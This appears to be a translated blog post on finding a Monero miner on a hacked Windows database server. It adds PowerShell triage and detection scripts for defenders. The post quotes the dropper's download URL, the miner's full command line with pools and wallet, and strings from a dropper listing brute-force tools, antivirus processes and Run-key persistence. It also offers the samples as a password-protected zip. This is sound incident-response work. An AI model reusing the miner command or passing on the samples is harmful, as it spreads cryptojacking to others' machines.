Yesterday afternoon I suddenly found that the website could not be opened. Looking into the cause, I found that the remote database port was unreachable, so I logged in to the remote database server. The MySQL service had stopped, and the CPU was at 100%, as shown in the following figure:
Sorting by CPU usage, "win1ogins.exe" consumed the most resources, occupying 73% of the CPU. From personal experience this should be mining software, mining XMR (Monero)!
I also discovered a process "MyBu.exe" written in Easy Language (易语言), and wondered when a program written in Easy Language had been uploaded to the server. As shown below:
Right-clicking "MyBu.exe" to open the file location gave the folder C:\Windows. Sorting by time, I found 3 new files, as shown below:
1ndy.exe, MyBu.exe and Mzol.exe
Seeing these strange files, I felt the server must have been hacked. I looked at the Windows logs and found that the login logs had been deleted; the server really had been hacked!
I tried right-clicking "win1ogins.exe" in the process list and opening the file location, but it could not be opened!! No reaction! All right! Tools!!
The tool I use is "PCHunter64.exe"; just search for it and download it yourself.
The folder where "win1ogins.exe" is located is C:\Windows\Fonts\system(x64)\, as shown in the figure below:
We can't find this folder in Explorer, as shown below:
For the following operations, I copied the 3 virus Trojan files to my newly purchased server!!
After copying the virus files to the new server I tried to open the MyBu.exe file, and found that MyBu.exe had deleted itself! And the mining software was released. We know that Explorer cannot open the file path,
so we tried the PowerShell tool that comes with newer versions of Windows, and found that the mining software exists, and there are 3 folders.
(Note: under normal circumstances C:\Windows\Fonts does not have any folders under it!!!)
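Explorer renders C:\Windows\Fonts as a special shell view that lists only installed fonts, which is why the system(x64) folder above never shows up there; a plain directory listing from PowerShell is not subject to that view. The following triage script is an added example and is not code from the original post or from the malware: it lists every folder and executable under Fonts with hash and signature status, then lists freshly created executables directly under C:\Windows, the location where 1ndy.exe, MyBu.exe and Mzol.exe were found. The seven-day window and the extension list are assumptions to adjust to the incident.

```powershell
# Added triage example (not from the original post). Run from an elevated
# PowerShell prompt on the suspect host.
$fontsDir = Join-Path $env:SystemRoot 'Fonts'

# 1. Any directory at all under Fonts is abnormal on a normal install.
$dirs = Get-ChildItem -LiteralPath $fontsDir -Directory -Force -ErrorAction SilentlyContinue
foreach ($d in $dirs) {
    Write-Output ("Unexpected folder under Fonts: {0}" -f $d.FullName)
    Get-ChildItem -LiteralPath $d.FullName -Recurse -Force -File -ErrorAction SilentlyContinue |
        Select-Object FullName, Length, CreationTime, LastWriteTime |
        Format-Table -AutoSize
}

# 2. Executables anywhere under Fonts, including the top level, with
#    SHA256 (for pool/AV lookups) and Authenticode status. Extension list
#    is an assumption; extend it as needed.
$execExt = '.exe', '.dll', '.bat', '.cmd', '.ps1', '.vbs', '.scr'
Get-ChildItem -LiteralPath $fontsDir -Recurse -Force -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -in $execExt } |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        [pscustomobject]@{
            Path      = $_.FullName
            SizeKB    = [math]::Round($_.Length / 1KB, 1)
            Created   = $_.CreationTime
            Signature = $sig.Status
            SHA256    = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        }
    } | Format-Table -AutoSize

# 3. Newest executables dropped straight into C:\Windows, the way the post
#    found its three files by sorting that folder by time. Seven days is an
#    assumed window; use the time the site went down if you know it.
$since = (Get-Date).AddDays(-7)
Get-ChildItem -LiteralPath $env:SystemRoot -File -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -eq '.exe' -and $_.CreationTime -gt $since } |
    Sort-Object CreationTime -Descending |
    Select-Object Name, Length, CreationTime, LastWriteTime |
    Format-Table -AutoSize
```

Hashes are taken before anything is deleted so that samples can still be matched against the attached archive or a sandbox report later; signature status alone is not proof of anything, since the miner in this post is an unsigned renamed build and legitimate font files are unsigned data as well.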
I installed the FD packet capture tool on my server and tried to open "1ndy.exe"; it tried to access http://221.229.204.124:9622/9622.exe, which should be downloading the latest version of the virus Trojan.
That site is now inaccessible.
We tried to open "Mzol.exe" and couldn't tell what the program wanted to do, so we opened it with Notepad, as shown below:
Strings visible in Mzol.exe (Chinese labels translated; the forum's word filter had mangled "Description", which is restored here):

Process names (game servers, file servers, attack tools and antivirus products): LogonServer.exe; Chess and card game GameServer.exe; Baidu Antivirus BaiduSdSvc.exe; Serv-U found ServUDaemon.exe; brute-forcing DUB.exe; scanning 1433 1433.exe; harvesting bots ("chickens") S.exe; Microsoft Security Essentials mssecess.exe; Quick Heal QUHLPSVC.EXE; AhnLab V3 V3Svc.exe; AhnLab patray.exe; Korean ALYac AYAgent.aye; Traffic Miner Miner.exe; Trend Micro TMBMSRV.exe; Ke Niu knsdtray.exe; QQ QQ.exe; K7 Antivirus K7TSecurity.exe; QQ PC Manager QQPCRTP.exe; Kingsoft Guardian ksafe.exe; Norton Antivirus rtvscan.exe; Avast ashDisp.exe; Avira avcenter.exe; Kingsoft kxetray.exe; NOD32 egui.exe; McAfee Mcshield.exe; Rising Antivirus RavMonD.exe; Jiangmin Antivirus KvMonXP.exe; Kaspersky avp.exe; 360 Antivirus 360sd.exe; 360 Security Guard 360tray.exe

Format strings, imports and hardware queries: %s:%d:%s; FriendlyName (stored as a UTF-16 string); SysFreeString; Oleaut32.dll; CoCreateInstance; CoUninitialize; CoInitialize; Ole32.dll; %d*%sMHz; HARDWARE\DESCRIPTION\System\CentralProcessor\0; ~MHz; c:\%s; kernel32.dll; IsWow64Process; No Info; Started logging in to

Persistence and service strings: SOFTWARE\Microsoft\Windows\CurrentVersion\Run; C:\Windows\1ndy.exe; Description; SYSTEM\CurrentControlSet\Services\%s; RtlGetNtVersionNumbers; ntdll.dll

Connection-type and RDP strings: OTHER connections; BUSY connections; PROXY connections; LAN connections; MODEM connections; NULL; CTXOPConntion_Class; 3389; PortNumber; SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s; Not discovered; Default; RDP-Tcp

Author: Shi Yonggang, email: pizzq@sina.com
Personally, I guess that "Mzol.exe" and "1ndy.exe" are actually the same thing, just the new version and the old version!
Let's look at the startup parameters of win1ogins.exe, as shown below:
C:\Windows\Fonts\system(x64)\win1ogins.exe -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p MyBlue -o stratum+tcp://pool.minexmr.com:443 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p x -k --donate-level=1
If it really is mining XMR (Monero), we open the mining pool site https://supportxmr.com/ and look up the wallet address, as shown in the figure below:
We calculate the income from the hash rate: about 0.42 XMR a day, and at the current price of more than 1,000 yuan per coin, the daily income is probably more than 500 yuan!
Of course, Monero has since risen to more than 2,000 yuan!
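The binary name tells you little (win1ogins.exe is a lookalike of winlogon.exe and could be renamed at will), but the command line above is characteristic: an XMRig-style miner passes the algorithm, pool and wallet as -a / -o / -u arguments, and the wallet address is the one constant across all of the attacker's deployments. The script below is an added example, not code from the original post: it finds miners by command line, extracts pools and wallets, lists their live TCP connections, and then checks the persistence locations named in the Mzol.exe strings (the per-machine Run key, services, and the RDP listener port). The regular expressions and the "binary lives under Fonts or directly in C:\Windows" heuristic are assumptions of this example.

```powershell
# Added detection example (not from the original post). Run elevated.

# 1. Miner processes identified by command line, not by name. The pattern is
#    an assumption covering stratum URLs and common XMRig-family options.
$minerPattern = 'stratum\+(tcp|ssl)://|cryptonight|--donate-level|--coin='
$procs = Get-CimInstance Win32_Process |
    Where-Object { $_.CommandLine -match $minerPattern }

foreach ($p in $procs) {
    $cmd = $p.CommandLine
    # -o/--url and -u/--user may repeat once per failover pool, as in the post.
    $pools   = [regex]::Matches($cmd, '(?:-o|--url)[=\s]+(\S+)')  | ForEach-Object { $_.Groups[1].Value }
    $wallets = [regex]::Matches($cmd, '(?:-u|--user)[=\s]+(\S+)') | ForEach-Object { $_.Groups[1].Value }
    $conns   = Get-NetTCPConnection -OwningProcess $p.ProcessId -State Established -ErrorAction SilentlyContinue |
               ForEach-Object { "{0}:{1}" -f $_.RemoteAddress, $_.RemotePort }
    [pscustomobject]@{
        PID         = $p.ProcessId
        Name        = $p.Name
        Path        = $p.ExecutablePath
        ParentPID   = $p.ParentProcessId
        Pools       = ($pools   | Select-Object -Unique) -join ', '
        Wallets     = ($wallets | Select-Object -Unique) -join ', '
        Connections = ($conns   | Select-Object -Unique) -join ', '
    } | Format-List
}

# 2. Run keys: the Mzol.exe strings pair the HKLM Run path with C:\Windows\1ndy.exe.
#    Flag any value pointing at an .exe directly in C:\Windows or under Fonts.
$suspectPath = '\\Windows\\[^\\]+\.exe|\\Fonts\\'
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
foreach ($k in $runKeys) {
    if (Test-Path $k) {
        Get-ItemProperty -Path $k |
            Select-Object -Property * -ExcludeProperty PS* |
            ForEach-Object { $_.PSObject.Properties } |
            Where-Object { $_.Value -match $suspectPath } |
            ForEach-Object { "Suspicious Run value in {0}: {1} = {2}" -f $k, $_.Name, $_.Value }
    }
}

# 3. Services (SYSTEM\CurrentControlSet\Services\%s also appears in the strings)
#    whose binary sits in the same suspicious locations.
Get-CimInstance Win32_Service |
    Where-Object { $_.PathName -match $suspectPath } |
    Select-Object Name, State, StartMode, PathName |
    Format-Table -AutoSize

# 4. Current RDP listener port; the dropper reads this key, and a changed port
#    on a box whose login logs were wiped is worth recording.
$rdp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
"RDP-Tcp PortNumber: {0}" -f $rdp.PortNumber
```

Killing the process alone does not help, as the post notes, because whatever re-launches it (the Run value, a service, or the dropper re-fetching from the 9622.exe URL) is still in place; the point of steps 2 and 3 is to find that launcher before removing the miner, and to record the wallet address so that the same operator can be recognised on other hosts.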
As for how to remove the "win1ogins.exe" mining virus: PCHunter64 can remove it manually! Simply ending the process doesn't work. I have manually cleaned the virus on my server.
Of course, it's better to leave virus removal to others; after all, I'm not a professional at this!
Finally, the 3 virus files are attached; the unzip password is A123456
1ndy.zip
(End)